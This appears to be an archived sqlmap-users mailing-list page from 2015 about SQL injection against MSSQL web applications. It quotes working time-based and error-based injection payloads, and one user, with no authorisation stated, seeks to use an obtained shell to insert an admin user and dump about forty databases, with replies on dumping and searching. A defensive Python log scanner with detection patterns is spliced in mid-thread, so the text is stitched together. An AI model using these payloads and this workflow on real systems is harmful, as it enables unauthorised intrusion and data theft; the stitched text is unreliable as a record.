Really not sure what you are trying to do. Do you want that "error-based" query to be part of "stacked-query" or what?

Bye

On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote:
> Maybe my question isn't clear, let me try again:
>
> I need to change stack query to not using timebase detection?
>
> Sqlmap detects injection there by error base type too, like this:
>
> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>
> How can I have this payload with type of stack query?
>
> Regards
>
> On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote:
>> Guys is there any chance?
>>
>> Thanks in advance
>>
>> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote:
>>> I mean how may I have custom payload:
>>>
>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>>
>>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
>>>> Hi
>>>>
>>>> sqlmap gave me shell with injection type of stack queries, but Payload is like this:
>>>>
>>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>>>
>>>> When I want insert with admin user sqlmap returns NULL and fails. Only says this before trying:
>>>>
>>>> [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>>>
>>>> Maybe I should change Payload, with what switch I can change payload?
>>>>
>>>> Regards

--
Miroslav Stampar
http://about.me/stamparm
From: a d. <deh...@gm...> - 2015-02-08 23:24:37
Maybe my question isn't clear, let me try again:

I need to change stack query to not using timebase detection?

Sqlmap detects injection there by error base type too, like this:

Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV

How can I have this payload with type of stack query?

Regards

On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote:
> Guys is there any chance?
>
> Thanks in advance
>
> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote:
>> I mean how may I have custom payload:
>>
>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>
>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
>>> Hi
>>>
>>> sqlmap gave me shell with injection type of stack queries, but Payload is like this:
>>>
>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>>
>>> When I want insert with admin user sqlmap returns NULL and fails. Only says this before trying:
>>>
>>> [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>>
>>> Maybe I should change Payload, with what switch I can change payload?
>>>
>>> Regards
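The WAITFOR DELAY, CONVERT(INT,(SELECT CHAR()...)) and UNION SELECT payload shapes quoted in these threads are exactly what the receiving side sees in its web server access log. As an added example (not code from sqlmap or from anyone on this list), here is a small Python checker that URL-decodes request query strings and tags the ones matching those shapes; the signatures, log lines, client addresses and paths are all constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed signatures modelled on the payload shapes quoted in this
# thread (not sqlmap code, not a complete injection detector).
SIGNATURES = {
    # id=6&rid=1'; WAITFOR DELAY '0:0:5'--
    "mssql-time-based": re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    # ... AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+...
    "mssql-error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "char-concat": re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){3,}", re.I),
    # UNION SELECT '<uuid>', NULL, 0x6664736166647361, NULL
    "union-select": re.compile(
        r"\bUNION\s+(?:ALL\s+)?SELECT\b[^\n]*?(?:\bNULL\b|\b0x[0-9a-f]{2,})", re.I),
}

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def decode_query(raw):
    """Decode form encoding once ('+' is a space), then plain percent-decoding
    up to twice more so double-encoded payloads are seen in clear."""
    text = unquote_plus(raw)
    for _ in range(2):
        nxt = unquote(text)  # plain unquote: a literal '+' must survive here
        if nxt == text:
            break
        text = nxt
    return text


def classify(query):
    """Return the names of every signature that matches the decoded query string."""
    text = decode_query(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    """Return (client, path, status, tags) for each log line whose query matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        client, _when, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        tags = classify(query)
        if tags:
            findings.append((client, path, int(status), tags))
    return findings


# Constructed access-log lines (documentation IP ranges, made-up paths),
# URL-encoded as a web server would record the quoted payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Feb/2015:13:10:02 +0000] "GET /app.asp?id=6&rid=1%27%3B%20WAITFOR'
    '%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Feb/2015:13:10:09 +0000] "GET /app.asp?req=6&senderid=1%27%20AND'
    '%209622%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28101%29%2BCHAR%28111%29'
    '%2BCHAR%2899%29%2BCHAR%28113%29%29%29%20AND%20%27PkmV%27%3D%27PkmV HTTP/1.1" 500 1034',
    '198.51.100.7 - - [09/Feb/2015:10:13:41 +0000] "GET /item.php?uuid=2403db44-b077-11e4'
    '-b0e1-000c29133bd7&page=2 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [09/Feb/2015:10:14:05 +0000] "GET /item.php?id=1%20UNION%20SELECT'
    '%20NULL%2CNULL%2C0x6664736166647361%2CNULL-- HTTP/1.1" 200 1900',
    'not a log line',
]

if __name__ == "__main__":
    for client, path, status, tags in scan_log(SAMPLE_LOG):
        print(f"{client} {path} HTTP {status}: {', '.join(tags)}")
```

The benign UUID request is left alone while the three injected ones are tagged; the error-based line also carries the HTTP 500 that the "picky column" discussion above predicts.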
From: a d. <deh...@gm...> - 2015-02-08 23:12:26
Guys is there any chance?

Thanks in advance

On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote:
> I mean how may I have custom payload:
>
> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>
> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
>> Hi
>>
>> sqlmap gave me shell with injection type of stack queries, but Payload is like this:
>>
>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>
>> When I want insert with admin user sqlmap returns NULL and fails. Only says this before trying:
>>
>> [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>
>> Maybe I should change Payload, with what switch I can change payload?
>>
>> Regards
From: Brandon P. <bpe...@gm...> - 2015-02-08 23:08:12
The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending an int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected.

On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
> Greetings,
> I am doing some pentesting for a corporation.
> I am testing some GET parameter of their web application and I encounter a strange issue.
> The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
> Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
> What might be the problem?
> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of Arch Linux.
> Thank you very much for your opinions,
> Vojta

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Vojtěch P. <kr...@gm...> - 2015-02-08 22:08:42
Greetings,
I am doing some pentesting for a corporation.
I am testing some GET parameter of their web application and I encounter a strange issue.
The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
What might be the problem?
I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of Arch Linux.
Thank you very much for your opinions,
Vojta
From: a d. <deh...@gm...> - 2015-02-05 16:01:15
I mean how may I have custom payload:

Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV

On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
> Hi
>
> sqlmap gave me shell with injection type of stack queries, but Payload is like this:
>
> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>
> When I want insert with admin user sqlmap returns NULL and fails. Only says this before trying:
>
> [WARNING] time-based comparison requires larger statistical model, please wait..............................
>
> Maybe I should change Payload, with what switch I can change payload?
>
> Regards
From: a d. <deh...@gm...> - 2015-02-05 13:12:32
Hi

sqlmap gave me shell with injection type of stack queries, but Payload is like this:

id=6&rid=1'; WAITFOR DELAY '0:0:5'--

When I want insert with admin user sqlmap returns NULL and fails. Only says this before trying:

[WARNING] time-based comparison requires larger statistical model, please wait..............................

Maybe I should change Payload, with what switch I can change payload?

Regards
From: Brandon P. <bpe...@gm...> - 2015-02-04 20:34:22
Only if you aren't using a time based payload

Sent from a phone

> On Feb 4, 2015, at 14:25, a dehqan <deh...@gm...> wrote:
>
> Hi
>
> Can we use Thread switch while dumping database?
>
> I mean it can be the only way to have faster dump?
>
> Regards
From: a d. <deh...@gm...> - 2015-02-04 20:25:50
Hi

Can we use Thread switch while dumping database?

I mean it can be the only way to have faster dump?

Regards
From: a d. <deh...@gm...> - 2015-02-04 15:59:20
how may I deploy this sp with sql shell?

http://pastebin.com/NtDWccp0

On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote:
> this searches in one table, how to say sql search in all tables (except writing all tables one by one)?
>
> On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> wrote:
>> You would be better off finding the most likely column to contain that value, then select from table where column = 'value'
>>
>> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote:
>>> Yes I think it's the way,
>>> How may I search based on column value in all tables all columns?
>>>
>>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote:
>>>> try --sql-shell
>>>>
>>>> 2015-02-04
>>>> ------------------------------
>>>> is2reg
>>>> ------------------------------
>>>> *From:* a dehqan <deh...@gm...>
>>>> *Sent:* 2015-02-04 23:20
>>>> *Subject:* Re: [sqlmap-users] Search based on fields value
>>>> *To:* "Brandon Perry"<bpe...@gm...>
>>>> *Cc:* ", sqlmap-users"<sql...@li...>,"Raymond"<ra...@te...>
>>>>
>>>> Thanks
>>>>
>>>> You mean first dump all databases and then search in files?
>>>> If yes I need a way without dumping all databases because database is huge of course, about 40 databases.
>>>>
>>>> And may I use --thread or any other option to make it faster?
>>>>
>>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>> --dump then grep?
>>>>>
>>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote:
>>>>>> Hi
>>>>>>
>>>>>> Guys, is there any way to search based on fields value on sqlmap?
>>>>>>
>>>>>> for example how to search in all databases for column with value of 1232434345?
>>>>>>
>>>>>> Regards
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website